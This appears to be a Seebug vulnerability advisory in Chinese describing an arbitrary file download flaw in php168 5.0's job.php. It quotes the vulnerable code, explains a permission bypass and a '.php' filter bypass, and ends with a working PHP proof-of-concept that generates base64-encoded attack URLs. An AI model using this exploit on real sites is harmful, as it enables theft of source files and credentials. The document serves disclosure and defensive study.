Lucene search

K
seebugRootSSV:87858
HistoryDec 28, 2009 - 12:00 a.m.

php168 5.0 job.php 信息泄漏漏洞

2009-12-2800:00:00
Root
www.seebug.org
13

漏洞分析

看job.php 92行

elseif($job=="download")
{
	$rsdb=$db->get_one("SELECT * FROM {$pre}article WHERE aid='$id'");
	$fidDB=$db->get_one("SELECT * FROM {$pre}sort WHERE fid='$rsdb[fid]'");

	if($fidDB[admin]&&$lfjid){
		$detail=explode(",",$fidDB[admin]);
		if( in_array($lfjid,$detail) ){
			$web_admin=1;
		}
	}

	if($fidDB[allowdownload]&&!$web_admin&&$lfjuid!==$rsdb[uid]){
		$detail=explode(",",$fidDB[allowdownload]);
		if( !in_array($groupdb['gid'],$detail) ){
			showerr("你所在的用户组无权限下载");
		}
	}
	if($rsdb[allowdown]&&!$web_admin&&$lfjuid!==$rsdb[uid]){
		$detail=explode(",",$rsdb[allowdown]);
		if( !in_array($groupdb['gid'],$detail) ){
			showerr("你所在的用户组无权限下载");
		}
	}
	$url=base64_decode($url);
	if( eregi(".php",$url) ){
		die("ERR");
	}
	$fileurl=str_replace($webdb[www_url],"",$url);
	if(is_file(PHP168_PATH."$fileurl")&&filesize(PHP168_PATH."$fileurl")<1024*1024*500){
		$filename=basename($fileurl);
		$filetype=substr(strrchr($filename,'.'),1);
		$_filename=preg_replace("/([\d]+)_(200[\d]+)_([^_]+)\.([^\.]+)/is","\\3",$filename);
		
		if(eregi("^([a-z0-9=]+)$",$_filename)&&!eregi("(jpg|gif|png)$",$filename)){
			$filename=urldecode(base64_decode($_filename)).".$filetype";
		}
		ob_end_clean();
		header('Last-Modified: '.gmdate('D, d M Y H:i:s',time()).' GMT');
		header('Pragma: no-cache');
		header('Content-Encoding: none');
		header('Content-Disposition: attachment; filename='.$filename);
		header('Content-type: '.$filetype);
		header('Content-Length: '.filesize(PHP168_PATH."$fileurl"));
		readfile(PHP168_PATH."$fileurl");
	}else{
		$fileurl=strstr($url,"://")?$url:tempdir($fileurl);
		header("location:$fileurl");
	}
	exit;
}

一开始是权限判断,可以发现若不传值id,那么两个判断都是为空的,从而可以越权访问。

然后看到116行

$url=base64_decode($url);
if( eregi(“.php”,$url) ){
die(“ERR”);
}
$fileurl=str_replace($webdb[www_url],“”,$url);

若匹配到了php会报错
但下面紧跟着一句代码,会将当前网站的网址替换成空
这样我们就能在php中间加上当前网站的网址,从而绕过过滤,达到下载任意文件的目的
比如 http://test/index.phttp://test.cnhp就可以绕过了

POC

<html>
<body>
<form  method="get">
URL: &lt;input type="text" name="url"&gt;<br>
DIR: &lt;input type="text" name="dir"&gt;<br>
&lt;input type="submit" value="Submit"&gt;<br>

&lt;?php
	$url = $_GET[url];
	$dir = (strlen($_GET[dir])&gt;0)?$_GET[dir]:"/index.php";
	if($url[strlen($url)-1]=='/') 
		$url = substr($url,0,strlen($url)-1);//如果URL的最后一位是/ 则去掉
	if ($dir[0]!='/')
		$dir = '/'.$dir;//如果第一位不是/则加上
	echo "AIM : ".$url."<br />";
	echo "DIR : ".$dir."<br /><br />";
	$t = 0;
	$B64 = $url.$dir;
	while ($r = strpos($B64,"php",$t)){ 
		$B64 = substr($B64,0,$r+1).$url.substr($B64,$r+1);
		$t = $r + 1;
	}
	$B64 = base64_encode($B64);
	$U = $url."/job.php?job=download&url=".$B64;
	echo "<a href>Attack</a>"
    
?&gt;
&lt;/body&gt;
&lt;/html&gt;